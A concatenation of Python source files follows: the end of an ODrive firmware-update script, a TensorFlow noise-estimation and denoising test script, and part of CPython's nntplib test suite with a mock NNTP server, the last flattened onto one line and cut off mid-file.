        odrive.configuration.restore_config(device, None, logger)
        os.remove(odrive.configuration.get_temp_config_filename(device))

    logger.success("Device firmware update successful.")


def launch_dfu(args, logger, cancellation_token):
    """
    Waits for a device that matches args.path and args.serial_number
    and then upgrades the device's firmware.
    """
    serial_number = args.serial_number
    find_odrive_cancellation_token = Event(cancellation_token)

    logger.info("Waiting for ODrive...")

    devices = [None, None]

    # Start background thread to scan for ODrives in DFU mode
    def find_device_in_dfu_mode_thread():
        devices[0] = find_device_in_dfu_mode(serial_number, find_odrive_cancellation_token)
        find_odrive_cancellation_token.set()
    threading.Thread(target=find_device_in_dfu_mode_thread).start()

    # Scan for ODrives not in DFU mode
    # We only scan on USB because DFU is only implemented over USB
    devices[1] = odrive.find_any("usb", serial_number,
                                 find_odrive_cancellation_token, cancellation_token)
    find_odrive_cancellation_token.set()

    device = devices[0] or devices[1]
    firmware = FirmwareFromFile(args.file) if args.file else None

    update_device(device, firmware, logger, cancellation_token)


# Note: the flashed image can be verified using: (0x12000 is the number of bytes to read)
# $ openocd -f interface/stlink-v2.cfg -f target/stm32f4x.cfg -c init -c flash\ read_bank\ 0\ image.bin\ 0\ 0x12000 -c exit
# $ hexdump -C image.bin > image.bin.txt
#
# If you compare this with a reference image that was flashed with the STLink, you will see
# minor differences. This is because this script fills undefined sections with 0xff.
# $ diff image_ref.bin.txt image.bin.txt
# 21c21
# < *
# ---
# > 00000180  d9 47 00 08 d9 47 00 08  ff ff ff ff ff ff ff ff  |.G...G..........|
# 2553c2553
# < 00009fc0  9e 46 70 47 00 00 00 00  52 20 96 3c 46 76 50 76  |.FpG....R .<FvPv|
# ---
# > 00009fc0  9e 46 70 47 ff ff ff ff  52 20 96 3c 46 76 50 76  |.FpG....R .<FvPv|
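# --- Illustrative sketch (added for clarity, not from the upstream tool) -------
# A minimal demonstration of the ordering implemented by Firmware.is_newer()
# above: a release build counts as newer than a prerelease with the same numeric
# version, and unknown (0, 0, 0) versions never compare as newer. The version
# tuples below are hypothetical examples, not real ODrive releases.
def _demo_version_ordering():
    assert Firmware.is_newer((0, 4, 7, False), (0, 4, 7, True))      # release beats prerelease
    assert not Firmware.is_newer((0, 4, 6, False), (0, 4, 7, True))  # smaller numeric version
    assert not Firmware.is_newer((0, 0, 0, False), (0, 4, 7, True))  # unknown version: no comparison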
test_drne_and_dn.py
# coding=utf8
# Author: TomHeaven, hanlin_tan@nudt.edu.cn, 2017.08.19

from __future__ import print_function
from tensorflow.contrib.layers import conv2d, avg_pool2d
import tensorflow as tf
import numpy as np
from data_v3 import DatabaseCreator
import time
import tqdm
import cv2
import re
import os
import argparse
import h5py
from multiprocessing import Process

# options
DEBUG = False

from model_noise_estimation_w64d16_v2_sigma0_30 import Estimator
from drdd_dn_sigma0_50 import DeepProcesser


def test_estimate(input_folder, modelPath, feature_dim, depth, device):
    """
    Estimate the noise level of noisy images using the Estimator class with a pre-trained model.
    :param modelPath: path to the saved trained model
    :param feature_dim: width of the DNN
    :param depth: depth of the DNN
    :param device: which GPU to use (for machines with multiple GPUs, this avoids taking up all GPUs)
    :return:
    """
    os.environ['CUDA_VISIBLE_DEVICES'] = device
    estimator = Estimator(batchSize=1, feature_dim=feature_dim, depth=depth)

    regexp = re.compile(r'.*\.(%s)' % '(jpg)|(png)|(bmp)|(tif)')
    #input_folder = 'data/mcm'
    psize = 250
    max_value = 255.0
    crop = 0
    n = 0
    avg_en = 0

    outFile = h5py.File('data/ne_res.h5', "w")

    for d, dirs, files in os.walk(input_folder):
        for f in files:
            if regexp.match(f):
                print('image', n, f)
                image = cv2.imread(os.path.join(d, f))
                #image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
                if DEBUG:
                    print('image.shape : ', image.shape)
                if n == 0:
                    xshape = [psize, psize, 3]
                    yshape = [psize, psize, 3]
                    estimator.load_model(modelPath, batchSize=1, xshape=xshape, yshape=yshape)
                image = image / max_value
                R, runtime = estimator.denoise_bayer(image, psize, crop)
                estimated_noise = np.mean(np.mean(np.mean(R, axis=0), axis=0), axis=0)

                if DEBUG:
                    print('max value = ', np.max(np.abs(R)))
                    print('time : ', runtime, ' ms')

                outFile.create_dataset('noise_estimation_%d' % n, data=np.mean(R, axis=2), compression='gzip')
                #outFile.create_dataset('runtime_%d' % n, data=R * 255, compression='gzip')
                print('estimate_noise : ', estimated_noise * 255.0)
                n += 1
                avg_en += estimated_noise
    outFile.close()
    print('avg_en : ', avg_en / n * 255.0)
    estimator.sess.close()


def test_denoise(input_folder, output_folder, model_dir, block_num, width, block_depth, device):
    ## denoise
    os.environ['CUDA_VISIBLE_DEVICES'] = device
    deepProcesser = DeepProcesser(block_num=block_num, width=width, block_depth=block_depth, use_scalar_noise=False)
    deepProcesser.load_model(model_dir, False)

    regexp = re.compile(r'.*\.(%s)' % '(tif|tiff|jpg|png)')

    if not os.path.isdir(output_folder):
        os.mkdir(output_folder)

    psize = 250
    max_value = 255.0
    crop = 0
    n = 0

    nl_file = h5py.File('data/ne_res.h5', "r")

    for d, dirs, files in os.walk(input_folder):
        for f in files:
            if regexp.match(f):
                print('image', n, f)
                image = cv2.imread(os.path.join(d, f))
                if DEBUG:
                    print('image.shape : ', image.shape)
                image = image / max_value
                noise = nl_file['noise_estimation_%d' % n].value
                #print('noise.shape : ', noise.shape)
                #noise = noise.transpose(2, 0, 1)
                noise = noise[np.newaxis, np.newaxis, ...]
                R, runtime = deepProcesser.test(image, noise, psize, crop)
                out = np.uint8(R * 255 + 0.5)
                # R = swap_blue_red(R)
                if DEBUG:
                    print('max value = ', np.max(np.abs(R)))
                    print('time : ', runtime, ' ms')
                cv2.imwrite(os.path.join(output_folder, f), out)
                n += 1


if __name__ == '__main__':
    ## configuration
    device = '1'
    # datasets: 'kodak', 'mcm', 'bsd500'  sigma 5, 15, 25
    datasets = ['kodak', 'mcm', 'bsd500']
    #sigmas = [5, 15, 25]
    sigmas = [15]

    for d in datasets:
        print(' Dataset : ', d)
        for s in sigmas:
            print(' Sigma : ', s)
            input_folder = 'data/%s_sigma%d' % (d, s)
            output_folder = 'res/drne+dn/%s_sigma%d' % (d, s)

            # estimation
            modelPath = 'ne_w64d16_v2_sigma0_30'
            width = 64
            depth = 16 - 4
            minNoiseLevel = 0.0 / 255.0
            maxNoiseLevel = 30.0 / 255.0
            #### end configuration

            # Launch TensorFlow in a child process so that GPU memory is fully
            # released when the process exits.
            p = Process(target=test_estimate, args=(input_folder, 'models/%s' % modelPath, width, depth, device))
            p.start()
            p.join()  # this blocks until the process terminates
            #test_estimate(input_folder, 'models/%s' % modelPath, width, depth=depth, device=device)

            # denoise
            modelPath = 'dn_sigma0_50'
            block_num = 5
            block_depth = 4
            width = 64

            # Launch the denoiser in a child process as well, so its GPU memory
            # is fully released when the process exits.
            p = Process(target=test_denoise, args=(input_folder, output_folder, 'models/%s' % modelPath, block_num, width, block_depth, device))
            p.start()
            p.join()  # this blocks until the process terminates
            #test_denoise(input_folder, output_folder, 'models/%s' % modelPath, block_num, width, block_depth, device=device)
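# --- Illustrative sketch (added for clarity, not from the original script) -----
# The pattern used above: each GPU stage runs in its own multiprocessing.Process,
# so the CUDA context (and all GPU memory it holds) is released when the child
# process exits instead of accumulating in the parent. The helper name
# run_isolated below is hypothetical.
from multiprocessing import Process

def run_isolated(stage_fn, *stage_args):
    """Run stage_fn(*stage_args) in a child process and wait for it to finish."""
    p = Process(target=stage_fn, args=stage_args)
    p.start()
    p.join()  # GPU memory held by the child is freed once it terminates

# Example usage (with the functions defined above):
#   run_isolated(test_estimate, input_folder, 'models/' + modelPath, width, depth, device)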
test_nntplib.py
import io import socket import datetime import textwrap import unittest import functools import contextlib import os.path import threading from test import support from nntplib import NNTP, GroupInfo import nntplib from unittest.mock import patch try: import ssl except ImportError: ssl = None TIMEOUT = 30 certfile = os.path.join(os.path.dirname(__file__), 'keycert3.pem') # TODO: # - test the `file` arg to more commands # - test error conditions # - test auth and `usenetrc` class NetworkedNNTPTestsMixin: def test_welcome(self): welcome = self.server.getwelcome() self.assertEqual(str, type(welcome)) def test_help(self): resp, lines = self.server.help() self.assertTrue(resp.startswith("100 "), resp) for line in lines: self.assertEqual(str, type(line)) def test_list(self): resp, groups = self.server.list() if len(groups) > 0: self.assertEqual(GroupInfo, type(groups[0])) self.assertEqual(str, type(groups[0].group)) def test_list_active(self): resp, groups = self.server.list(self.GROUP_PAT) if len(groups) > 0: self.assertEqual(GroupInfo, type(groups[0])) self.assertEqual(str, type(groups[0].group)) def test_unknown_command(self): with self.assertRaises(nntplib.NNTPPermanentError) as cm: self.server._shortcmd("XYZZY") resp = cm.exception.response self.assertTrue(resp.startswith("500 "), resp) def test_newgroups(self): # gmane gets a constant influx of new groups. In order not to stress # the server too much, we choose a recent date in the past. dt = datetime.date.today() - datetime.timedelta(days=7) resp, groups = self.server.newgroups(dt) if len(groups) > 0: self.assertIsInstance(groups[0], GroupInfo) self.assertIsInstance(groups[0].group, str) def test_description(self): def _check_desc(desc): # Sanity checks self.assertIsInstance(desc, str) self.assertNotIn(self.GROUP_NAME, desc) desc = self.server.description(self.GROUP_NAME) _check_desc(desc) # Another sanity check self.assertIn("Python", desc) # With a pattern desc = self.server.description(self.GROUP_PAT) _check_desc(desc) # Shouldn't exist desc = self.server.description("zk.brrtt.baz") self.assertEqual(desc, '') def test_descriptions(self): resp, descs = self.server.descriptions(self.GROUP_PAT) # 215 for LIST NEWSGROUPS, 282 for XGTITLE self.assertTrue( resp.startswith("215 ") or resp.startswith("282 "), resp) self.assertIsInstance(descs, dict) desc = descs[self.GROUP_NAME] self.assertEqual(desc, self.server.description(self.GROUP_NAME)) def test_group(self): result = self.server.group(self.GROUP_NAME) self.assertEqual(5, len(result)) resp, count, first, last, group = result self.assertEqual(group, self.GROUP_NAME) self.assertIsInstance(count, int) self.assertIsInstance(first, int) self.assertIsInstance(last, int) self.assertLessEqual(first, last) self.assertTrue(resp.startswith("211 "), resp) def test_date(self): resp, date = self.server.date() self.assertIsInstance(date, datetime.datetime) # Sanity check self.assertGreaterEqual(date.year, 1995) self.assertLessEqual(date.year, 2030) def _check_art_dict(self, art_dict): # Some sanity checks for a field dictionary returned by OVER / XOVER self.assertIsInstance(art_dict, dict) # NNTP has 7 mandatory fields self.assertGreaterEqual(art_dict.keys(), {"subject", "from", "date", "message-id", "references", ":bytes", ":lines"} ) for v in art_dict.values(): self.assertIsInstance(v, (str, type(None))) def test_xover(self): resp, count, first, last, name = self.server.group(self.GROUP_NAME) resp, lines = self.server.xover(last - 5, last) if len(lines) == 0: self.skipTest("no articles retrieved") # 
The 'last' article is not necessarily part of the output (cancelled?) art_num, art_dict = lines[0] self.assertGreaterEqual(art_num, last - 5) self.assertLessEqual(art_num, last) self._check_art_dict(art_dict) @unittest.skipIf(True, 'temporarily skipped until a permanent solution' ' is found for issue #28971') def test_over(self): resp, count, first, last, name = self.server.group(self.GROUP_NAME) start = last - 10 # The "start-" article range form resp, lines = self.server.over((start, None)) art_num, art_dict = lines[0] self._check_art_dict(art_dict) # The "start-end" article range form resp, lines = self.server.over((start, last)) art_num, art_dict = lines[-1] # The 'last' article is not necessarily part of the output (cancelled?) self.assertGreaterEqual(art_num, start) self.assertLessEqual(art_num, last) self._check_art_dict(art_dict) # XXX The "message_id" form is unsupported by gmane # 503 Overview by message-ID unsupported def test_xhdr(self): resp, count, first, last, name = self.server.group(self.GROUP_NAME) resp, lines = self.server.xhdr('subject', last) for line in lines: self.assertEqual(str, type(line[1])) def check_article_resp(self, resp, article, art_num=None): self.assertIsInstance(article, nntplib.ArticleInfo) if art_num is not None: self.assertEqual(article.number, art_num) for line in article.lines: self.assertIsInstance(line, bytes) # XXX this could exceptionally happen... self.assertNotIn(article.lines[-1], (b".", b".\n", b".\r\n")) @unittest.skipIf(True, "FIXME: see bpo-32128") def test_article_head_body(self): resp, count, first, last, name = self.server.group(self.GROUP_NAME) # Try to find an available article for art_num in (last, first, last - 1): try: resp, head = self.server.head(art_num) except nntplib.NNTPTemporaryError as e: if not e.response.startswith("423 "): raise # "423 No such article" => choose another one continue break else: self.skipTest("could not find a suitable article number") self.assertTrue(resp.startswith("221 "), resp) self.check_article_resp(resp, head, art_num) resp, body = self.server.body(art_num) self.assertTrue(resp.startswith("222 "), resp) self.check_article_resp(resp, body, art_num) resp, article = self.server.article(art_num) self.assertTrue(resp.startswith("220 "), resp) self.check_article_resp(resp, article, art_num) # Tolerate running the tests from behind a NNTP virus checker blacklist = lambda line: line.startswith(b'X-Antivirus') filtered_head_lines = [line for line in head.lines if not blacklist(line)] filtered_lines = [line for line in article.lines if not blacklist(line)] self.assertEqual(filtered_lines, filtered_head_lines + [b''] + body.lines) def test_capabilities(self): # The server under test implements NNTP version 2 and has a # couple of well-known capabilities. Just sanity check that we # got them. def _check_caps(caps): caps_list = caps['LIST'] self.assertIsInstance(caps_list, (list, tuple)) self.assertIn('OVERVIEW.FMT', caps_list) self.assertGreaterEqual(self.server.nntp_version, 2) _check_caps(self.server.getcapabilities()) # This re-emits the command resp, caps = self.server.capabilities() _check_caps(caps) def test_zlogin(self): # This test must be the penultimate because further commands will be # refused. 
baduser = "notarealuser" badpw = "notarealpassword" # Check that bogus credentials cause failure self.assertRaises(nntplib.NNTPError, self.server.login, user=baduser, password=badpw, usenetrc=False) # FIXME: We should check that correct credentials succeed, but that # would require valid details for some server somewhere to be in the # test suite, I think. Gmane is anonymous, at least as used for the # other tests. def test_zzquit(self): # This test must be called last, hence the name cls = type(self) try: self.server.quit() finally: cls.server = None @classmethod def wrap_methods(cls): # Wrap all methods in a transient_internet() exception catcher # XXX put a generic version in test.support? def wrap_meth(meth): @functools.wraps(meth) def wrapped(self): with support.transient_internet(self.NNTP_HOST): meth(self) return wrapped for name in dir(cls): if not name.startswith('test_'): continue meth = getattr(cls, name) if not callable(meth): continue # Need to use a closure so that meth remains bound to its current # value setattr(cls, name, wrap_meth(meth)) def test_with_statement(self): def is_connected(): if not hasattr(server, 'file'): return False try: server.help() except (OSError, EOFError): return False return True with self.NNTP_CLASS(self.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) as server: self.assertTrue(is_connected()) self.assertTrue(server.help()) self.assertFalse(is_connected()) with self.NNTP_CLASS(self.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) as server: server.quit() self.assertFalse(is_connected()) NetworkedNNTPTestsMixin.wrap_methods() EOF_ERRORS = (EOFError,) if ssl is not None: EOF_ERRORS += (ssl.SSLEOFError,) class NetworkedNNTPTests(NetworkedNNTPTestsMixin, unittest.TestCase): # This server supports STARTTLS (gmane doesn't) NNTP_HOST = 'news.trigofacile.com' GROUP_NAME = 'fr.comp.lang.python' GROUP_PAT = 'fr.comp.lang.*' NNTP_CLASS = NNTP @classmethod def setUpClass(cls): support.requires("network") with support.transient_internet(cls.NNTP_HOST): try: cls.server = cls.NNTP_CLASS(cls.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) except EOF_ERRORS: raise unittest.SkipTest(f"{cls} got EOF error on connecting " f"to {cls.NNTP_HOST!r}") @classmethod def tearDownClass(cls): if cls.server is not None: cls.server.quit() @unittest.skipUnless(ssl, 'requires SSL support') class NetworkedNNTP_SSLTests(NetworkedNNTPTests): # Technical limits for this public NNTP server (see http://www.aioe.org): # "Only two concurrent connections per IP address are allowed and # 400 connections per day are accepted from each IP address." NNTP_HOST = 'nntp.aioe.org' GROUP_NAME = 'comp.lang.python' GROUP_PAT = 'comp.lang.*' NNTP_CLASS = getattr(nntplib, 'NNTP_SSL', None) # Disabled as it produces too much data test_list = None # Disabled as the connection will already be encrypted. test_starttls = None # # Non-networked tests using a local server (or something mocking it). # class _NNTPServerIO(io.RawIOBase): """A raw IO object allowing NNTP commands to be received and processed by a handler. 
The handler can push responses which can then be read from the IO object.""" def __init__(self, handler): io.RawIOBase.__init__(self) # The channel from the client self.c2s = io.BytesIO() # The channel to the client self.s2c = io.BytesIO() self.handler = handler self.handler.start(self.c2s.readline, self.push_data) def readable(self): return True def writable(self): return True def push_data(self, data): """Push (buffer) some data to send to the client.""" pos = self.s2c.tell() self.s2c.seek(0, 2) self.s2c.write(data) self.s2c.seek(pos) def write(self, b): """The client sends us some data""" pos = self.c2s.tell() self.c2s.write(b) self.c2s.seek(pos) self.handler.process_pending() return len(b) def readinto(self, buf): """The client wants to read a response""" self.handler.process_pending() b = self.s2c.read(len(buf)) n = len(b) buf[:n] = b return n def make_mock_file(handler): sio = _NNTPServerIO(handler) # Using BufferedRWPair instead of BufferedRandom ensures the file # isn't seekable. file = io.BufferedRWPair(sio, sio) return (sio, file) class MockedNNTPTestsMixin: # Override in derived classes handler_class = None def setUp(self): super().setUp() self.make_server() def tearDown(self): super().tearDown() del self.server def make_server(self, *args, **kwargs): self.handler = self.handler_class() self.sio, file = make_mock_file(self.handler) self.server = nntplib._NNTPBase(file, 'test.server', *args, **kwargs) return self.server class MockedNNTPWithReaderModeMixin(MockedNNTPTestsMixin): def setUp(self): super().setUp() self.make_server(readermode=True) class NNTPv1Handler: """A handler for RFC 977""" welcome = "200 NNTP mock server" def start(self, readline, push_data): self.in_body = False self.allow_posting = True self._readline = readline self._push_data = push_data self._logged_in = False self._user_sent = False # Our welcome self.handle_welcome() def _decode(self, data): return str(data, "utf-8", "surrogateescape") def process_pending(self): if self.in_body: while True: line = self._readline() if not line: return self.body.append(line) if line == b".\r\n": break try: meth, tokens = self.body_callback meth(*tokens, body=self.body) finally: self.body_callback = None self.body = None self.in_body = False while True: line = self._decode(self._readline()) if not line: return if not line.endswith("\r\n"): raise ValueError("line doesn't end with \\r\\n: {!r}".format(line)) line = line[:-2] cmd, *tokens = line.split() #meth = getattr(self.handler, "handle_" + cmd.upper(), None) meth = getattr(self, "handle_" + cmd.upper(), None) if meth is None: self.handle_unknown() else: try: meth(*tokens) except Exception as e: raise ValueError("command failed: {!r}".format(line)) from e else: if self.in_body: self.body_callback = meth, tokens self.body = [] def expect_body(self): """Flag that the client is expected to post a request body""" self.in_body = True def push_data(self, data): """Push some binary data""" self._push_data(data) def push_lit(self, lit): """Push a string literal""" lit = textwrap.dedent(lit) lit = "\r\n".join(lit.splitlines()) + "\r\n" lit = lit.encode('utf-8') self.push_data(lit) def handle_unknown(self): self.push_lit("500 What?") def handle_welcome(self): self.push_lit(self.welcome) def handle_QUIT(self): self.push_lit("205 Bye!") def handle_DATE(self): self.push_lit("111 20100914001155") def handle_GROUP(self, group): if group == "fr.comp.lang.python": self.push_lit("211 486 761 1265 fr.comp.lang.python") else: self.push_lit("411 No such group {}".format(group)) def 
handle_HELP(self): self.push_lit("""\ 100 Legal commands authinfo user Name|pass Password|generic <prog> <args> date help Report problems to <root@example.org> .""") def handle_STAT(self, message_spec=None): if message_spec is None: self.push_lit("412 No newsgroup selected") elif message_spec == "3000234": self.push_lit("223 3000234 <45223423@example.com>") elif message_spec == "<45223423@example.com>": self.push_lit("223 0 <45223423@example.com>") else: self.push_lit("430 No Such Article Found") def handle_NEXT(self): self.push_lit("223 3000237 <668929@example.org> retrieved") def handle_LAST(self): self.push_lit("223 3000234 <45223423@example.com> retrieved") def handle_LIST(self, action=None, param=None): if action is None: self.push_lit("""\ 215 Newsgroups in form "group high low flags". comp.lang.python 0000052340 0000002828 y comp.lang.python.announce 0000001153 0000000993 m free.it.comp.lang.python 0000000002 0000000002 y fr.comp.lang.python 0000001254 0000000760 y free.it.comp.lang.python.learner 0000000000 0000000001 y tw.bbs.comp.lang.python 0000000304 0000000304 y .""") elif action == "ACTIVE": if param == "*distutils*": self.push_lit("""\ 215 Newsgroups in form "group high low flags" gmane.comp.python.distutils.devel 0000014104 0000000001 m gmane.comp.python.distutils.cvs 0000000000 0000000001 m .""") else: self.push_lit("""\ 215 Newsgroups in form "group high low flags" .""") elif action == "OVERVIEW.FMT": self.push_lit("""\ 215 Order of fields in overview database. Subject: From: Date: Message-ID: References: Bytes: Lines: Xref:full .""") elif action == "NEWSGROUPS": assert param is not None if param == "comp.lang.python": self.push_lit("""\ 215 Descriptions in form "group description". comp.lang.python\tThe Python computer language. .""") elif param == "comp.lang.python*": self.push_lit("""\ 215 Descriptions in form "group description". comp.lang.python.announce\tAnnouncements about the Python language. (Moderated) comp.lang.python\tThe Python computer language. .""") else: self.push_lit("""\ 215 Descriptions in form "group description". .""") else: self.push_lit('501 Unknown LIST keyword') def handle_NEWNEWS(self, group, date_str, time_str): # We hard code different return messages depending on passed # argument and date syntax. if (group == "comp.lang.python" and date_str == "20100913" and time_str == "082004"): # Date was passed in RFC 3977 format (NNTP "v2") self.push_lit("""\ 230 list of newsarticles (NNTP v2) created after Mon Sep 13 08:20:04 2010 follows <a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com> <f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com> .""") elif (group == "comp.lang.python" and date_str == "100913" and time_str == "082004"): # Date was passed in RFC 977 format (NNTP "v1") self.push_lit("""\ 230 list of newsarticles (NNTP v1) created after Mon Sep 13 08:20:04 2010 follows <a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com> <f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com> .""") elif (group == 'comp.lang.python' and date_str in ('20100101', '100101') and time_str == '090000'): self.push_lit('too long line' * 3000 + '\n.') else: self.push_lit("""\ 230 An empty list of newsarticles follows .""") # (Note for experiments: many servers disable NEWNEWS. # As of this writing, sicinfo3.epfl.ch doesn't.) 
def handle_XOVER(self, message_spec): if message_spec == "57-59": self.push_lit( "224 Overview information for 57-58 follows\n" "57\tRe: ANN: New Plone book with strong Python (and Zope) themes throughout" "\tDoug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>" "\tSat, 19 Jun 2010 18:04:08 -0400" "\t<4FD05F05-F98B-44DC-8111-C6009C925F0C@gmail.com>" "\t<hvalf7$ort$1@dough.gmane.org>\t7103\t16" "\tXref: news.gmane.org gmane.comp.python.authors:57" "\n" "58\tLooking for a few good bloggers" "\tDoug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>" "\tThu, 22 Jul 2010 09:14:14 -0400" "\t<A29863FA-F388-40C3-AA25-0FD06B09B5BF@gmail.com>" "\t\t6683\t16" "\t" "\n" # A UTF-8 overview line from fr.comp.lang.python "59\tRe: Message d'erreur incompréhensible (par moi)" "\tEric Brunel <eric.brunel@pragmadev.nospam.com>" "\tWed, 15 Sep 2010 18:09:15 +0200" "\t<eric.brunel-2B8B56.18091515092010@news.wanadoo.fr>" "\t<4c90ec87$0$32425$ba4acef3@reader.news.orange.fr>\t1641\t27" "\tXref: saria.nerim.net fr.comp.lang.python:1265" "\n" ".\n") else: self.push_lit("""\ 224 No articles .""") def handle_POST(self, *, body=None): if body is None: if self.allow_posting: self.push_lit("340 Input article; end with <CR-LF>.<CR-LF>") self.expect_body() else: self.push_lit("440 Posting not permitted") else: assert self.allow_posting self.push_lit("240 Article received OK") self.posted_body = body def handle_IHAVE(self, message_id, *, body=None): if body is None: if (self.allow_posting and message_id == "<i.am.an.article.you.will.want@example.com>"): self.push_lit("335 Send it; end with <CR-LF>.<CR-LF>") self.expect_body() else: self.push_lit("435 Article not wanted") else: assert self.allow_posting self.push_lit("235 Article transferred OK") self.posted_body = body sample_head = """\ From: "Demo User" <nobody@example.net> Subject: I am just a test article Content-Type: text/plain; charset=UTF-8; format=flowed Message-ID: <i.am.an.article.you.will.want@example.com>""" sample_body = """\ This is just a test article. ..Here is a dot-starting line. 
-- Signed by Andr\xe9.""" sample_article = sample_head + "\n\n" + sample_body def handle_ARTICLE(self, message_spec=None): if message_spec is None: self.push_lit("220 3000237 <45223423@example.com>") elif message_spec == "<45223423@example.com>": self.push_lit("220 0 <45223423@example.com>") elif message_spec == "3000234": self.push_lit("220 3000234 <45223423@example.com>") else: self.push_lit("430 No Such Article Found") return self.push_lit(self.sample_article) self.push_lit(".") def handle_HEAD(self, message_spec=None): if message_spec is None: self.push_lit("221 3000237 <45223423@example.com>") elif message_spec == "<45223423@example.com>": self.push_lit("221 0 <45223423@example.com>") elif message_spec == "3000234": self.push_lit("221 3000234 <45223423@example.com>") else: self.push_lit("430 No Such Article Found") return self.push_lit(self.sample_head) self.push_lit(".") def handle_BODY(self, message_spec=None): if message_spec is None: self.push_lit("222 3000237 <45223423@example.com>") elif message_spec == "<45223423@example.com>": self.push_lit("222 0 <45223423@example.com>") elif message_spec == "3000234": self.push_lit("222 3000234 <45223423@example.com>") else: self.push_lit("430 No Such Article Found") return self.push_lit(self.sample_body) self.push_lit(".") def handle_AUTHINFO(self, cred_type, data): if self._logged_in: self.push_lit('502 Already Logged In') elif cred_type == 'user': if self._user_sent: self.push_lit('482 User Credential Already Sent') else: self.push_lit('381 Password Required') self._user_sent = True elif cred_type == 'pass': self.push_lit('281 Login Successful') self._logged_in = True else: raise Exception('Unknown cred type {}'.format(cred_type)) class NNTPv2Handler(NNTPv1Handler): """A handler for RFC 3977 (NNTP "v2")""" def handle_CAPABILITIES(self): fmt = """\ 101 Capability list: VERSION 2 3 IMPLEMENTATION INN 2.5.1{} HDR LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT OVER POST READER .""" if not self._logged_in: self.push_lit(fmt.format('\n AUTHINFO USER')) else: self.push_lit(fmt.format('')) def handle_MODE(self, _): raise Exception('MODE READER sent despite READER has been advertised') def handle_OVER(self, message_spec=None): return self.handle_XOVER(message_spec) class CapsAfterLoginNNTPv2Handler(NNTPv2Handler): """A handler that allows CAPABILITIES only after login""" def handle_CAPABILITIES(self): if not self._logged_in: self.push_lit('480 You must log in.') else: super().handle_CAPABILITIES() class ModeSwitchingNNTPv2Handler(NNTPv2Handler): """A server that starts in transit mode""" def __init__(self): self._switched = False def handle_CAPABILITIES(self): fmt = """\ 101 Capability list: VERSION 2 3 IMPLEMENTATION INN 2.5.1 HDR LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT OVER POST {}READER .""" if self._switched: self.push_lit(fmt.format('')) else: self.push_lit(fmt.format('MODE-')) def handle_MODE(self, what): assert not self._switched and what == 'reader' self._switched = True self.push_lit('200 Posting allowed') class NNTPv1v2TestsMixin: def setUp(self): super().setUp() def test_welcome(self): self.assertEqual(self.server.welcome, self.handler.welcome) def test_authinfo(self): if self.nntp_version == 2: self.assertIn('AUTHINFO', self.server._caps) self.server.login('testuser', 'testpw') # if AUTHINFO is gone from _caps we also know that getcapabilities() # has been called after login as it should self.assertNotIn('AUTHINFO', self.server._caps) def test_date(self): resp, date = 
self.server.date() self.assertEqual(resp, "111 20100914001155") self.assertEqual(date, datetime.datetime(2010, 9, 14, 0, 11, 55)) def test_quit(self): self.assertFalse(self.sio.closed) resp = self.server.quit() self.assertEqual(resp, "205 Bye!") self.assertTrue(self.sio.closed) def test_help(self): resp, help = self.server.help() self.assertEqual(resp, "100 Legal commands") self.assertEqual(help, [ ' authinfo user Name|pass Password|generic <prog> <args>', ' date', ' help', 'Report problems to <root@example.org>', ]) def test_list(self): resp, groups = self.server.list() self.assertEqual(len(groups), 6) g = groups[1] self.assertEqual(g, GroupInfo("comp.lang.python.announce", "0000001153", "0000000993", "m")) resp, groups = self.server.list("*distutils*") self.assertEqual(len(groups), 2) g = groups[0] self.assertEqual(g, GroupInfo("gmane.comp.python.distutils.devel", "0000014104", "0000000001", "m")) def test_stat(self): resp, art_num, message_id = self.server.stat(3000234) self.assertEqual(resp, "223 3000234 <45223423@example.com>") self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") resp, art_num, message_id = self.server.stat("<45223423@example.com>") self.assertEqual(resp, "223 0 <45223423@example.com>") self.assertEqual(art_num, 0) self.assertEqual(message_id, "<45223423@example.com>") with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.stat("<non.existent.id>") self.assertEqual(cm.exception.response, "430 No Such Article Found") with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.stat() self.assertEqual(cm.exception.response, "412 No newsgroup selected") def test_next(self): resp, art_num, message_id = self.server.next() self.assertEqual(resp, "223 3000237 <668929@example.org> retrieved") self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<668929@example.org>") def test_last(self): resp, art_num, message_id = self.server.last() self.assertEqual(resp, "223 3000234 <45223423@example.com> retrieved") self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") def test_description(self): desc = self.server.description("comp.lang.python") self.assertEqual(desc, "The Python computer language.") desc = self.server.description("comp.lang.pythonx") self.assertEqual(desc, "") def test_descriptions(self): resp, groups = self.server.descriptions("comp.lang.python") self.assertEqual(resp, '215 Descriptions in form "group description".') self.assertEqual(groups, { "comp.lang.python": "The Python computer language.", }) resp, groups = self.server.descriptions("comp.lang.python*") self.assertEqual(groups, { "comp.lang.python": "The Python computer language.", "comp.lang.python.announce": "Announcements about the Python language. 
